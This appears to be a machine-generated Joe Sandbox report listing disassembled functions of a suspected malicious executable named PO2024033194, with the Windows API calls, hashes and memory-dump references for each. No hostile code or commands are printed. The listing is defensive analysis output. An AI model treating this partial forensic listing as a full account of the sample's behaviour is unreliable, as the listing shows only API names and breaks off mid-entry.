                                                                  • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                  • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                  • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                  • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                  Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                                                  • API String ID: 2574300362-3530519716
                                                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                  Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: ICMP.DLL$IcmpCreateFile
                                                                  • API String ID: 2574300362-275556492
                                                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                  Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: ICMP.DLL$IcmpSendEcho
                                                                  • API String ID: 2574300362-58917771
                                                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                  Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2574300362-4033151799
                                                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                  Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                  Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                  Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                  • __itow.LIBCMT ref: 004699CD
                                                                    • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                  • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                  • __itow.LIBCMT ref: 00469A97
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                  • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                  • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                  • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                  Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                  • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                  Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                  Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                  • GetWindowRect.USER32(?,?), ref: 00441722
                                                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                  Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                  • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 3321077145-0
                                                                  • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                  • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                  • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                  • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                  Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                  Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 004503C8
                                                                  • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                  • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                  • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Proc$Parent
                                                                  • String ID:
                                                                  • API String ID: 2351499541-0
                                                                  • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                  • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                  • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                  • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                  Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                  • TranslateMessage.USER32(?), ref: 00442B01
                                                                  • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                  • String ID:
                                                                  • API String ID: 1795658109-0
                                                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                  Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                  • GetCaretPos.USER32(?), ref: 004743B2
